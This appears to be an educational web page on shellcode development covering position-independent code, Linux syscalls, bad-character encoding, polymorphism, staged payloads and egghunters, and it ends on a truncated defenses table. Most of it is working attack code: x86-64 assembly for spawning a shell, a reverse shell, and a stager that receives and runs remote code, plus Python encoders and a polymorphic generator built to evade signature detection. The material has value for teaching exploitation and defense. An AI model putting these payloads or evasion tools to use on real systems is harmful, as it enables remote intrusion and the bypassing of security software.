Sandboxing	Restrict available syscalls	Shellcode functionality limited	Use allowed syscalls, sandbox escape

Adaptation Strategies

•ROP for DEP Bypass — Instead of executing injected code, chain existing code fragments ('gadgets') that end in RET. Turing-complete computation possible. Covered in next page.
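•Information Leaks for ASLR Bypass — Use separate vulnerability to read memory, revealing library addresses. Because offsets within a module are fixed, a single leaked pointer can derandomize every address the attack chain needs from that module.
•Canary Brute Force — On fork-based servers, children inherit the parent's canary and a crashed child doesn't take down the parent, so the canary can be recovered one byte at a time.
•JIT Spray — Coax a JIT compiler into emitting attacker-chosen byte sequences (for example, via constants in script code) into memory that the engine marks executable. Mitigations in modern JavaScript engines have made this much harder.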
•Data-Only Attacks — Corrupt application data without changing control flow. Avoid DEP and CFI but achieve desired outcome.
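
To see why byte-by-byte canary recovery matters to defenders, compare the guess counts: an 8-byte canary needs at most 8 × 256 = 2,048 guesses when each byte can be confirmed separately, against 2^64 for the whole value at once. The toy model below counts guesses against an in-process oracle; `make_oracle` and `recover` are hypothetical names, and the oracle merely stands in for "the forked child did not crash".

```python
import secrets


def make_oracle(canary):
    """Toy model: a guess 'survives' only if it matches the canary prefix."""
    attempts = {"count": 0}

    def survives(guess_prefix):
        attempts["count"] += 1
        return canary.startswith(guess_prefix)

    return survives, attempts


def recover(survives, size=8):
    """Confirm one byte at a time, keeping every byte already confirmed."""
    known = b""
    for _ in range(size):
        for candidate in range(256):
            if survives(known + bytes([candidate])):
                known += bytes([candidate])
                break
    return known


# Modeled canary: a zero low byte followed by random bytes (an assumption of this toy).
canary = b"\x00" + secrets.token_bytes(7)
survives, attempts = make_oracle(canary)
recovered = recover(survives)

print("recovered:", recovered == canary)
print("guesses used:", attempts["count"], "of at most", 8 * 256)
print("whole-value search space:", 2 ** 64)
```

Re-randomizing the canary in each child process removes the prefix-confirmation step this model relies on.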

The Arms Race Continues

Each defense spawns bypass research; each bypass prompts stronger defenses. Modern exploitation often requires chaining multiple vulnerabilities: one for info leak, one for control flow, one for privilege escalation. Single-bug exploitation is increasingly rare against hardened targets.

Summary: Mastering Code Injection

We've explored the art and science of shellcode development—from fundamental position-independent code to advanced polymorphic and staged payloads. Let's consolidate the key insights.

Key Takeaways

•Shellcode must be position-independent — JMP-CALL-POP, stack-based strings, and RIP-relative addressing enable code that runs anywhere in memory.
•System calls are the shellcode's interface to the kernel — Understanding syscall mechanics enables arbitrary actions: spawning shells, network connections, file operations.
•Bad characters require encoding — XOR encoding with decoder stubs bypasses byte filters; alphanumeric encoders handle the most restrictive contexts.
•Polymorphism defeats signatures — Varying encoding keys, instruction selection, and junk insertion makes each payload unique.
•Staged payloads overcome size limits — Tiny stagers fetch full payloads over network; egghunters locate large payloads in memory.
•Modern defenses require adaptation — DEP, ASLR, and CFI don't eliminate exploitation but shift techniques toward ROP, info leaks, and chains.

What's Next: Return-Oriented Programming

The next page explores Return-Oriented Programming (ROP)—the dominant technique for exploiting systems with DEP enabled. When we can't execute injected code, we chain existing code fragments to achieve arbitrary computation without ever executing attacker-controlled bytes directly.

Page Complete

You now understand the fundamentals of shellcode development: position independence, system call mechanics, encoding techniques, and the constraints imposed by modern defenses. This knowledge is essential for understanding both vulnerability exploitation and the design of effective mitigations.

Code Injection

The Art of Weaponized Bytes

This page transforms you from understanding exploitation conceptually to understanding the payload itself—the bytes that make exploitation worthwhile.

What You Will Learn

Shellcode Fundamentals

Shellcode is machine code (raw CPU instructions) designed to execute arbitrary operations when injected into a running process. Unlike compiled programs, shellcode has unique constraints:

Position Independence: Shellcode doesn't know where in memory it will land. It cannot use absolute addresses for its own data or code. All references must be relative or computed at runtime.

Self-Containment: Shellcode typically cannot rely on external libraries being loaded at known addresses. It must make direct system calls or use carefully-located library functions.

Size Minimization: Smaller buffer = tighter space constraints. Every byte counts when you're working within a 64-byte or 128-byte overflow window.

Character Restrictions: Many vulnerabilities involve string functions that filter certain bytes. Shellcode must avoid or encode those bytes.

Common Shellcode Categories

•Local Shellcode — Executes on the same machine. Spawns a shell, reads files, or modifies system state. Used for local privilege escalation or post-exploitation.
•Bind Shell — Opens a listening port on the target machine. Attacker connects inbound. Problem: firewalls often block unexpected inbound connections.
•Reverse Shell — Initiates an outbound connection to the attacker's machine. Bypasses ingress firewall rules. Most common in real-world exploitation.
•Egghunter — Tiny first-stage shellcode that searches memory for a larger second-stage payload marked with a unique signature ('egg'). Used when exploit buffer is too small for full payload.
•Staged Payload — First stage is minimal (connect back, receive data); second stage is the full payload downloaded over the network. Metasploit's meterpreter uses this model.
•Fileless Execution — Loads code directly into memory without touching disk. Evades file-based antivirus detection.

Why 'Shell' Code?

Writing Position-Independent Code

Position-independent code (PIC) executes correctly regardless of where it's loaded in memory. This is essential for shellcode because we can't predict the exact address where our payload will land.

The Problem: Shellcode often needs to reference strings (like /bin/sh) or other data. Normal code uses absolute addresses, but we don't know our address.

The Solution: Multiple techniques exist to create position-independent references:

PIC Techniques

•JMP-CALL-POP Technique — Jump forward over data, call backward to get address pushed on stack, pop that address into a register. Classic and reliable.
•Stack-Based String Building — Push string bytes onto stack, then reference via stack pointer. No absolute addresses needed.
•RIP-Relative Addressing (x86-64) — On 64-bit, use lea rax, [rip+offset] to get addresses relative to current instruction. Very clean on modern architectures.
•GetPC Techniques — Various tricks to get the current program counter (instruction pointer) value into a register, enabling relative calculations.

jmp_call_pop.asm

Assembly (x86-64)

;; JMP-CALL-POP Technique for position-independent string reference
;; This is the classic technique, works on all x86/x64
 
section .text
global _start
 
_start:
    jmp short get_string_addr    ; Jump forward over data access code
 
execute_shell:
    pop rdi                       ; Pop string address from stack
                                  ; (CALL pushed address of string)
    
    xor rsi, rsi                  ; argv = NULL
    xor rdx, rdx                  ; envp = NULL
    
    push 59                       ; syscall number for execve
    pop rax                       ; Avoid null bytes in mov rax, 59
    
    syscall                       ; Execute execve("/bin/sh", NULL, NULL)
 
get_string_addr:
    call execute_shell            ; CALL pushes address of next byte (the string)
    db "/bin/sh", 0               ; String data immediately after CALL
 
;; Assembled, this becomes:
;; eb 0c                    jmp short get_string_addr (+12 bytes)
;; 5f                       pop rdi
;; 48 31 f6                 xor rsi, rsi
;; 48 31 d2                 xor rdx, rdx  
;; 6a 3b                    push 59
;; 58                       pop rax
;; 0f 05                    syscall
;; e8 ef ff ff ff           call execute_shell (-17 bytes)
;; 2f 62 69 6e 2f 73 68 00  "/bin/sh\0"
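
The jump and call displacements in a JMP-CALL-POP stub follow directly from the instruction lengths. As a rough check, the sketch below recomputes them for this listing. The lengths are the usual NASM encodings of each instruction, and the helper name `offsets` is purely illustrative.

```python
# Instruction lengths (in bytes) for the JMP-CALL-POP listing, in order.
layout = [
    ("jmp short get_string_addr", 2),
    ("pop rdi", 1),
    ("xor rsi, rsi", 3),
    ("xor rdx, rdx", 3),
    ("push 59", 2),
    ("pop rax", 1),
    ("syscall", 2),
    ("call execute_shell", 5),
]

def offsets(instrs):
    """Return {name: (start, end)} byte offsets for each instruction."""
    table, pos = {}, 0
    for name, size in instrs:
        table[name] = (pos, pos + size)
        pos += size
    return table

table = offsets(layout)
execute_shell = table["pop rdi"][0]               # label on the first instruction after the jmp
get_string_addr = table["call execute_shell"][0]  # label on the call

# Relative displacements are measured from the END of the branching instruction.
jmp_rel8 = get_string_addr - table["jmp short get_string_addr"][1]
call_rel32 = execute_shell - table["call execute_shell"][1]

print(f"jmp  rel8  = {jmp_rel8:+d} -> {jmp_rel8 & 0xff:02x}")
print(f"call rel32 = {call_rel32:+d} -> "
      f"{(call_rel32 & 0xffffffff).to_bytes(4, 'little').hex(' ')}")
```

The backward call yields a negative displacement, so its encoding is padded with 0xff bytes rather than nulls, which is one reason this layout is popular in null-sensitive contexts.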

stack_string.asm

Assembly (x86-64)

;; Stack-based string building (no JMP-CALL needed)
;; Push string onto stack, reference via RSP
 
section .text
global _start
 
_start:
    xor rsi, rsi                  ; RSI = 0 (also serves as null terminator)
    push rsi                      ; Push null terminator onto stack
    
    ; Push "/bin//sh" (8 bytes, padded to avoid partial push)
    ; In little-endian: 0x68732f2f6e69622f
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh" 
    push rdi                      ; Push string onto stack
    
    mov rdi, rsp                  ; RDI = pointer to string on stack
    
    ; RSI already 0 (argv = NULL)
    xor rdx, rdx                  ; envp = NULL
    
    push 59
    pop rax                       ; Syscall number (execve = 59)
    
    syscall
 
;; Key insight: The string "/bin//sh" is built on the stack
;; The kernel's path lookup treats repeated slashes as one, and the extra slash gives us exactly 8 bytes
;; No null bytes except the terminator, which is pushed from a zeroed register
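
The 64-bit immediate in this listing can be derived rather than memorized. The following is a small sketch, using only the Python standard library, that shows how the path bytes map to the little-endian constant.

```python
import struct

path = b"/bin//sh"                      # 8 bytes, so it fills one 64-bit register exactly
assert len(path) == 8

# Interpreting the bytes as a little-endian integer gives the immediate to load.
imm64 = int.from_bytes(path, "little")
print(hex(imm64))                       # 0x68732f2f6e69622f

# Pushing the register stores it little-endian again, restoring the byte order.
on_stack = struct.pack("<Q", imm64)
assert on_stack == path
assert 0 not in on_stack                # no NUL bytes inside the immediate itself
```

With the seven-byte "/bin/sh" the top byte of the immediate would be 0x00, which is why the padded form is used.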

Why Double Slashes?

System Call Mechanics

Shellcode operates in user space but needs kernel services—spawning processes, opening network connections, reading files. On Linux, this is accomplished through system calls (syscalls).

System Call Invocation on Linux x86-64:

Place syscall number in RAX
Place arguments in RDI, RSI, RDX, R10, R8, R9 (in order)
Execute the syscall instruction
Return value appears in RAX

Essential System Calls for Shellcode
Syscall	Number (x64)	Arguments	Purpose
`execve`	59 (0x3b)	rdi=path, rsi=argv, rdx=envp	Execute a program (spawn shell)
`read`	0	rdi=fd, rsi=buf, rdx=count	Read from file descriptor
`write`	1	rdi=fd, rsi=buf, rdx=count	Write to file descriptor
`open`	2	rdi=path, rsi=flags, rdx=mode	Open a file
`socket`	41	rdi=domain, rsi=type, rdx=proto	Create network socket
`connect`	42	rdi=sockfd, rsi=addr, rdx=len	Connect to remote host
`dup2`	33	rdi=oldfd, rsi=newfd	Duplicate file descriptor
`mprotect`	10	rdi=addr, rsi=len, rdx=prot	Change memory permissions
`fork`	57	(none)	Create child process
`exit`	60	rdi=status	Terminate process cleanly
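
As a reading aid for the table, the sketch below maps a call such as socket(2, 1, 0) onto the register convention described above. The dictionary copies the numbers from the table, and `register_setup` is a hypothetical helper name, not part of any library.

```python
# Argument registers for the Linux x86-64 syscall convention, in order.
ARG_REGS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]

# Syscall numbers taken from the table above.
SYSCALLS = {
    "read": 0, "write": 1, "open": 2, "mprotect": 10, "dup2": 33,
    "socket": 41, "connect": 42, "fork": 57, "execve": 59, "exit": 60,
}

def register_setup(name, *args):
    """Return the register assignments needed before executing `syscall`."""
    if len(args) > len(ARG_REGS):
        raise ValueError("at most six arguments are passed in registers")
    setup = {"rax": SYSCALLS[name]}
    setup.update(zip(ARG_REGS, args))
    return setup

print(register_setup("socket", 2, 1, 0))
print(register_setup("dup2", "sockfd", 0))
```

Note that the fourth argument goes in R10 rather than RCX, because the `syscall` instruction itself overwrites RCX and R11.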

reverse_shell.asm

Assembly (x86-64)

;; Reverse Shell Shellcode for Linux x86-64
;; Connects back to 127.0.0.1:4444 and spawns /bin/sh
;; Attacker runs: nc -lvp 4444
 
section .text
global _start
 
_start:
    ;; Create socket: socket(AF_INET=2, SOCK_STREAM=1, 0)
    xor rdi, rdi
    push rdi                      ; Push 0 for socket()
    pop rsi                       ; RSI = 0
    inc rsi                       ; RSI = 1 (SOCK_STREAM)
    push 2
    pop rdi                       ; RDI = 2 (AF_INET)
    xor rdx, rdx                  ; RDX = 0 (protocol)
    push 41
    pop rax                       ; syscall 41 = socket
    syscall
    
    mov r12, rax                  ; Save socket fd in R12
    
    ;; Build sockaddr_in structure on stack
    ;; struct sockaddr_in { sin_family=2, sin_port=0x5c11 (4444), sin_addr=127.0.0.1 }
    xor rax, rax
    push rax                      ; sin_zero padding
    
    mov eax, 0x0100007f           ; 127.0.0.1 in network byte order
    push rax                      ; sin_addr
    
    push word 0x5c11              ; port 4444 in network byte order
    push word 2                   ; AF_INET
    
    mov rsi, rsp                  ; RSI = pointer to sockaddr_in
    
    ;; Connect: connect(sockfd, &sockaddr, 16)
    mov rdi, r12                  ; Socket fd
    push 16
    pop rdx                       ; Address length
    push 42
    pop rax                       ; syscall 42 = connect
    syscall
    
    ;; Duplicate socket to stdin/stdout/stderr
    ;; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rdi, r12                  ; Socket fd
    xor rsi, rsi                  ; Start with fd 0 (stdin)
    
dup_loop:
    push 33
    pop rax                       ; syscall 33 = dup2
    syscall
    inc rsi
    cmp rsi, 3
    jne dup_loop
    
    ;; Execute shell: execve("/bin/sh", NULL, NULL)
    xor rsi, rsi
    push rsi                      ; NULL terminator
    mov rdi, 0x68732f2f6e69622f   ; "/bin//sh"
    push rdi
    mov rdi, rsp                  ; RDI = pointer to string
    xor rdx, rdx                  ; envp = NULL
    push 59
    pop rax                       ; syscall 59 = execve
    syscall
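
The byte order of the `sockaddr_in` fields is the part of this listing that most often goes wrong. As a sketch, assuming the Linux layout of a 2-byte family in host order, a 2-byte port in network order, a 4-byte address and 8 bytes of padding, the same structure can be built and inspected in Python.

```python
import socket
import struct

def sockaddr_in(ip: str, port: int) -> bytes:
    """Pack a 16-byte IPv4 sockaddr_in as laid out on little-endian Linux."""
    return (
        struct.pack("<H", 2)          # sin_family = AF_INET, host byte order
        + struct.pack(">H", port)     # sin_port, network (big-endian) byte order
        + socket.inet_aton(ip)        # sin_addr, network byte order
        + bytes(8)                    # sin_zero padding
    )

addr = sockaddr_in("127.0.0.1", 4444)
print(addr.hex(" "))

# The assembly pushes little-endian words, so the constants look byte-swapped:
assert struct.pack("<H", 0x5c11) == struct.pack(">H", 4444)              # port
assert struct.pack("<I", 0x0100007f) == socket.inet_aton("127.0.0.1")    # address
print("NUL bytes in structure:", addr.count(0))
```

The count printed at the end is a reminder that loopback addresses and padding introduce null bytes, which matters in the bad-character discussion that follows.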

32-bit vs 64-bit Syscalls

Avoiding Bad Characters

Bad characters are bytes that the vulnerability context corrupts, terminates, or filters. Common bad characters include:

\x00 (NULL) — Terminates strings in C
\x0a (newline) — Terminates input for fgets, line-based protocols
\x0d (carriage return) — Terminates input in some contexts
\x20 (space) — May be treated as delimiter
\x09 (tab) — May be treated as whitespace
\xff — Sometimes filtered by UTF-8 validation

The specific bad characters depend on the vulnerability and input handling.

Finding Bad Characters

•Send full byte range (0x00-0xff) as test payload
•Compare received/stored data with original
•Missing or altered bytes are bad chars
•Tools: mona.py, BadChars generator
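
The steps above can be sketched as a loop: send every byte value, find the first one that was lost or altered, exclude it, and repeat. In the sketch below `simulated_target` is a hypothetical stand-in for the vulnerable input path (it stops copying at NUL, newline, or carriage return); in practice the received bytes would come from a debugger or memory dump.

```python
def make_probe(exclude=b""):
    """All byte values 0x00-0xff in order, minus those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)

def first_bad_char(sent, received):
    """Return the first sent byte that is missing or altered, or None if all match."""
    for i, b in enumerate(sent):
        if i >= len(received) or received[i] != b:
            return b
    return None

def simulated_target(data):
    """Hypothetical input handler: copying stops at NUL, LF, or CR."""
    out = bytearray()
    for b in data:
        if b in (0x00, 0x0a, 0x0d):
            break
        out.append(b)
    return bytes(out)

bad = bytearray()
while True:
    probe = make_probe(bytes(bad))
    culprit = first_bad_char(probe, simulated_target(probe))
    if culprit is None:
        break
    bad.append(culprit)

print("bad characters:", bad.hex(" "))
```

Only one bad character is identified per round because everything after the first corruption is unreliable, which mirrors how the manual process works.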

Avoidance Strategies

•XOR encoding with single-byte key
•Multi-byte XOR for stronger encoding
•Alphanumeric shellcode (A-Z, a-z, 0-9 only)
•Unicode-safe encoding for wide-char contexts

xor_encoder.py
Python
#!/usr/bin/env python3
"""
XOR Encoder for Shellcode
Encodes shellcode to avoid specified bad characters
Prepends a decoder stub that runs first and decodes the payload
"""
 
def find_xor_key(shellcode: bytes, bad_chars: bytes) -> int:
    """Find an XOR key that, when applied, produces no bad characters."""
    for key in range(1, 256):  # Skip 0 as XOR with 0 is no-op
        encoded = bytes([b ^ key for b in shellcode])
        if not any(c in bad_chars for c in encoded):
            # Also verify the key itself isn't a bad char (appears in decoder)
            if key not in bad_chars:
                return key
    raise ValueError("No valid XOR key found - try multi-byte encoding")
 
def xor_encode(shellcode: bytes, key: int) -> bytes:
    """XOR encode shellcode with given key."""
    return bytes([b ^ key for b in shellcode])
 
def generate_decoder_stub(key: int, length: int) -> bytes:
    """
    Generate x86-64 decoder stub.
    This stub XOR-decodes the following payload in-place.
    """
    if not 1 <= length <= 255:
        raise ValueError("payload length must fit in CL (1-255 bytes)")
    # Decoder stub that decodes payload after itself
    # Uses JMP-CALL-POP to get address of encoded payload
    decoder = bytes([
        0xeb, 0x0f,                    # jmp short get_payload_addr (+15)
        # decode_loop:
        0x5e,                          # pop rsi (address of encoded shellcode)
        0x31, 0xc9,                    # xor ecx, ecx (zero-extends into rcx)
        0xb1, length,                  # mov cl, length
        # decode:
        0x80, 0x36, key,               # xor byte [rsi], key
        0x48, 0xff, 0xc6,              # inc rsi (a lone 0x46 is a REX prefix in 64-bit mode)
        0xe2, 0xf8,                    # loop decode (-8)
        0xeb, 0x05,                    # jmp short shellcode (skips the call)
        # get_payload_addr:
        0xe8, 0xec, 0xff, 0xff, 0xff,  # call decode_loop (-20)
        # Encoded shellcode follows here
    ])
    return decoder
 
# Example usage
original_shellcode = bytes([
    0x48, 0x31, 0xf6,              # xor rsi, rsi
    0x56,                          # push rsi (NUL terminator for the string)
    0x48, 0xbf, 0x2f, 0x62, 0x69,  # mov rdi, '/bin//sh'
    0x6e, 0x2f, 0x2f, 0x73, 0x68,
    0x57,                          # push rdi
    0x48, 0x89, 0xe7,              # mov rdi, rsp
    0x48, 0x31, 0xd2,              # xor rdx, rdx
    0x6a, 0x3b,                    # push 59
    0x58,                          # pop rax (sets all of rax, unlike mov al)
    0x0f, 0x05                     # syscall
])
 
bad_chars = b"\x00\x0a\x0d"
 
print(f"Original shellcode: {len(original_shellcode)} bytes")
print(f"Bad characters to avoid: {bad_chars.hex()}")
 
# Find suitable key
key = find_xor_key(original_shellcode, bad_chars)
print(f"XOR key found: 0x{key:02x}")
 
# Encode
encoded = xor_encode(original_shellcode, key)
print(f"Encoded shellcode: {encoded.hex()}")
 
# Verify no bad chars
for c in encoded:
    if bytes([c]) in bad_chars:
        print(f"ERROR: Bad char 0x{c:02x} in encoded shellcode!")
        break
else:
    print("✓ No bad characters in encoded payload")
 
# Generate complete payload with decoder
decoder = generate_decoder_stub(key, len(original_shellcode))
final_payload = decoder + encoded
print(f"Final payload: {len(final_payload)} bytes")
print(f"Payload hex: {final_payload.hex()}")

Self-Decoding Payloads

Alphanumeric and Polymorphic Shellcode

Alphanumeric Shellcode

•Constraint: Only bytes 0x30-0x39 (0-9), 0x41-0x5A (A-Z), 0x61-0x7A (a-z) allowed
•Challenge: Most essential instructions (syscall, jumps) use non-alphanumeric bytes
•Solution: Use the limited valid instructions to build a decoder that can generate arbitrary bytes
•Techniques: XOR with alphanumeric values, push/pop combinations, arithmetic operations
•Tools: alpha2, msfvenom's alpha_mixed encoder, ALPHA3
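
To make the constraint concrete, the sketch below checks a few well-known x86 encodings against the alphanumeric byte ranges listed above. The helper name `non_alnum` is illustrative.

```python
import string

# Byte values allowed in strictly alphanumeric shellcode: 0-9, A-Z, a-z.
ALNUM = set((string.ascii_letters + string.digits).encode())

def non_alnum(code: bytes):
    """Return (offset, byte) pairs for every byte outside the alphanumeric set."""
    return [(i, b) for i, b in enumerate(code) if b not in ALNUM]

samples = {
    "push eax":            bytes([0x50]),
    "pop eax":             bytes([0x58]),
    "xor eax, 0x39443143": bytes([0x35, 0x43, 0x31, 0x44, 0x39]),
    "and eax, 0x554e4d4a": bytes([0x25, 0x4a, 0x4d, 0x4e, 0x55]),
    "int 0x80":            bytes([0xcd, 0x80]),
    "syscall":             bytes([0x0f, 0x05]),
}

for name, code in samples.items():
    offenders = non_alnum(code)
    verdict = "ok" if not offenders else "rejected: " + ", ".join(f"0x{b:02x}" for _, b in offenders)
    print(f"{name:22} {code.hex(' '):16} {verdict}")
```

The `and eax, imm32` opcode (0x25, '%') is printable but not alphanumeric, so it is only usable when the filter allows general printable ASCII.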

alphanumeric_concept.asm

Assembly Concepts

;; Alphanumeric-compatible instructions (x86, 32-bit)
;; These opcodes fall within A-Z, a-z, 0-9 ASCII ranges
 
;; Valid alphanumeric instructions include:
;; push/pop certain registers: P (0x50) = push eax, X (0x58) = pop eax
;; inc/dec: I = dec ecx (0x49), A = inc ecx (0x41), etc.
;; xor reg,imm: 5 = xor eax,imm32 (0x35), 4 = xor al,imm8 (0x34)
;; push imm: j = push imm8 (0x6a), h = push imm32 (0x68)
;; Note: and eax,imm32 is % (0x25), which is printable ASCII but not alphanumeric
 
;; Example: Building a value in EAX using printable opcodes
;; Approach: AND with two masks that share no set bits (result 0), then XOR in the target
 
push eax                    ; P (0x50) - valid
and eax, 0x554e4d4a        ; bytes 25 4a 4d 4e 55 = "%JMNU"
and eax, 0x2a313235        ; bytes 25 35 32 31 2a = "%521*" (EAX is now 0x00000000)
xor eax, 0x39443143        ; bytes 35 43 31 44 39 = "5C1D9" (EAX = 0x39443143)
;; The % and * bytes make this sequence printable rather than strictly alphanumeric.
;; A strictly alphanumeric way to zero EAX is push 0x30 / pop eax / xor al, 0x30 ("j0X40").
;; XOR with alphanumeric immediates only yields bytes below 0x80, so a value such as
;; 0x99c0cd80 (which embeds int 0x80) needs extra steps, e.g. dec on a zeroed register first.
 
;; After building decoder in alphanumeric ops, decode and run real shellcode
 
;; Tools like alpha2 automatically generate these sequences
;; Example: msfvenom -p linux/x86/shell_reverse_tcp ... -e x86/alpha_mixed

Polymorphic Shellcode

Polymorphic shellcode changes its appearance on each generation while maintaining identical functionality. This defeats signature-based detection that looks for specific byte patterns.

How Polymorphism Works:

Variable encoding keys: Each instance uses a different XOR key, completely changing all encoded bytes
Decoder variation: The decoder stub itself uses different but equivalent instructions
NOP substitution: Different single-byte NOPs or multi-byte NOP equivalents
Register shuffling: Use different registers for the same operations
Junk insertion: Add non-functional instructions that change signature but don't affect execution
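
The effect of variable encoding keys on a byte-pattern signature can be shown without any real payload. In the sketch below the "payload" is a harmless placeholder string and the "signature" is simply an 8-byte slice of it; both are assumptions made for illustration.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)

payload = b"EXAMPLE-PAYLOAD-BYTES"    # harmless placeholder, not real shellcode
signature = payload[4:12]             # what a naive byte-pattern scanner would match

assert signature in payload           # the unencoded form is detected

for key in (0x21, 0x5a, 0xc3):
    variant = xor_bytes(payload, key)
    detected = signature in variant
    restored = xor_bytes(variant, key) == payload
    print(f"key=0x{key:02x}  {variant[:8].hex(' ')} ...  "
          f"signature found: {detected}  decodes correctly: {restored}")
```

Every variant decodes to the same bytes, which is why scanners that emulate or unpack the decoder can still match the original signature even though a static pattern match on the encoded form fails.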

polymorphic_generator.py
Python
#!/usr/bin/env python3
"""
Simple Polymorphic Shellcode Generator
Generates unique encoded variants of base shellcode
"""
 
import random
 
def generate_polymorphic_variant(shellcode: bytes) -> bytes:
    """Generate a unique polymorphic variant of shellcode."""
    
    # Random XOR key (avoid 0x00)
    key = random.randint(1, 255)
    
    # Encode shellcode
    encoded = bytes([b ^ key for b in shellcode])
    
    # Generate decoder with random variations
    decoder = generate_varied_decoder(key, len(shellcode))
    
    # Add random NOP sled variation
    nop_variants = [
        b"\x90",              # NOP
        b"\x40\x48",         # inc eax; dec eax (null operation pair)
        b"\x87\xc0",         # xchg eax, eax
        b"\x86\xc9",         # xchg cl, cl  
    ]
    
    nop_sled = b""
    for _ in range(random.randint(8, 32)):
        nop_sled += random.choice(nop_variants)
    
    return nop_sled + decoder + encoded
 
def generate_varied_decoder(key: int, length: int) -> bytes:
    """Generate a 32-bit x86 decoder with random instruction choices."""
    if not 1 <= length <= 255:
        raise ValueError("payload length must fit in an 8-bit counter (1-255)")
    
    # Choose random register for loop counter (CL or BL)
    use_cl = random.choice([True, False])
    
    if use_cl:
        # Version using CL
        set_counter = bytes([0x31, 0xc9, 0xb1, length])  # xor ecx,ecx; mov cl,len
        loop_inst = bytes([0xe2])                        # loop rel8
    else:
        # Version using BL (two bytes longer, so every offset shifts)
        set_counter = bytes([0x31, 0xdb, 0xb3, length])  # xor ebx,ebx; mov bl,len
        loop_inst = bytes([0xfe, 0xcb, 0x75])            # dec bl; jnz rel8
    
    # Random junk instructions to insert (no-ops that change signature)
    junk_options = [
        b"",                   # No junk
        b"\x50\x58",         # push eax; pop eax
        b"\x51\x59",         # push ecx; pop ecx
        b"\x90",              # nop
    ]
    junk = random.choice(junk_options)
    
    # Loop body: xor byte [esi], key; inc esi; <loop instruction>
    body = bytes([0x80, 0x36, key, 0x46]) + loop_inst
    back = (-(len(body) + 1)) & 0xff     # rel8 back to the start of the body
    
    # Everything between the initial jmp and the call; offsets are derived
    # from the actual lengths so both register variants stay consistent
    middle = (junk + bytes([0x5e])       # pop esi (address of encoded payload)
              + set_counter + body
              + bytes([back, 0xeb, 0x05]))  # rel8, then jmp short over the call
    
    call_rel = (-(len(middle) + 5)) & 0xffffffff  # call back to first byte after the jmp
    return (bytes([0xeb, len(middle)]) + middle
            + bytes([0xe8]) + call_rel.to_bytes(4, "little"))
 
# Generate multiple unique variants of same shellcode
base_shellcode = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50,
    0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
])
 
print("Generating 3 polymorphic variants:")
for i in range(3):
    variant = generate_polymorphic_variant(base_shellcode)
    print(f"\nVariant {i+1}: {len(variant)} bytes")
    print(f"  First 20 bytes: {variant[:20].hex()}")
    print(f"  Hash: {hash(variant) & 0xffffffff:08x}")

Metamorphic Shellcode

Staged and Modular Payloads


Staged Payload Architecture

•Stager (Stage 1) — Minimal code that establishes communication and receives the main payload. Examples: reverse_tcp stager (~30 bytes), bind_tcp stager (~50 bytes), find_sock stager (~35 bytes).
•Payload (Stage 2) — The full-featured payload delivered after stager connects. Can be arbitrarily large since it's transmitted over network/socket.
•Egghunter Variant — When second stage is already in memory (e.g., larger buffer elsewhere), stager searches for signature ('egg') and jumps to it.

stager.asm

Assembly (x86-64)

;; Minimal TCP Stager (reverse connect, receive, execute)
;; Fits in approximately 75 bytes
;; Connects to attacker, receives arbitrary code, executes it
 
section .text
global _start
 
_start:
    ;; socket(AF_INET=2, SOCK_STREAM=1, 0)
    push 41                       ; syscall: socket
    pop rax
    push 2
    pop rdi                       ; AF_INET
    push 1
    pop rsi                       ; SOCK_STREAM
    xor rdx, rdx                  ; 0
    syscall
    mov r12, rax                  ; Save socket fd
 
    ;; Build sockaddr_in and connect
    push rdx                      ; 0 padding
    mov eax, 0x0100007f           ; 127.0.0.1
    push rax
    push word 0x5c11              ; Port 4444
    push word 2                   ; AF_INET
    
    push 42                       ; syscall: connect
    pop rax
    mov rdi, r12                  ; socket fd
    mov rsi, rsp                  ; sockaddr pointer
    push 16
    pop rdx                       ; addrlen
    syscall
 
    ;; mmap executable memory for payload
    push 9                        ; syscall: mmap
    pop rax
    xor rdi, rdi                  ; addr = NULL
    push 4096
    pop rsi                       ; length
    push 7                        ; PROT_READ|WRITE|EXEC
    pop rdx
    push 0x22                     ; MAP_ANONYMOUS|PRIVATE
    pop r10
    push -1                       ; imm8 sign-extended to 0xffffffffffffffff
    pop r8                        ; fd = -1
    xor r9, r9                    ; offset = 0
    syscall
    mov r13, rax                  ; Save mmap address
 
    ;; read(socket, mmap_addr, 4096)
    xor rax, rax                  ; syscall: read
    mov rdi, r12                  ; socket fd
    mov rsi, r13                  ; buffer (mmap)
    push 4096
    pop rdx                       ; count
    syscall
 
    ;; Jump to received payload
    jmp r13

Egghunter Technique

When you can inject a large payload into memory but only control a small buffer for the initial exploit, an egghunter bridges the gap:

Inject large payload into some reachable memory (heap, environment, etc.)
Prefix payload with unique 8-byte signature (the "egg"): e.g., w00tw00t
Small egghunter shellcode in exploited buffer searches memory for egg
When found, jump to address immediately after egg

Egghunters must handle:

Invalid memory pages (use syscalls to safely probe)
Searching in correct direction
Finding the actual payload, not the egg reference in the egghunter itself (hence doubled egg signature)
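
The reason for the doubled signature is easiest to see in a simulation. The sketch below searches a plain `bytes` object standing in for process memory. It illustrates only the matching logic and does not model unmapped pages; the buffer contents and the name `find_payload` are invented for the example.

```python
EGG = b"w00t"   # 4-byte tag; the payload is prefixed with two copies

def find_payload(memory: bytes, egg: bytes = EGG):
    """Return the offset just past the doubled egg, or None if it is absent."""
    marker = egg + egg
    pos = memory.find(marker)
    return None if pos < 0 else pos + len(marker)

# The hunter itself has to contain one copy of the egg in order to compare against it.
hunter = b"\x90" * 4 + EGG + b"\x90" * 4
memory = (
    b"\x00" * 16 + hunter            # small exploited buffer holding the hunter
    + b"\x00" * 32                   # unrelated data
    + EGG + EGG + b"PAYLOAD"         # second stage placed elsewhere
    + b"\x00" * 8
)

single_hit = memory.find(EGG)        # naive search lands inside the hunter
start = find_payload(memory)

print("single-egg match at offset", single_hit, "(inside the hunter)")
print("doubled-egg payload at offset", start, "->", memory[start:start + 7])
```

A single-tag search stops at the hunter's own copy of the tag, while the doubled form matches only the real payload prefix.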

Metasploit Framework

Modern Shellcode Challenges

Defenses Against Code Injection
Defense	Mechanism	Impact on Shellcode	Bypass Technique
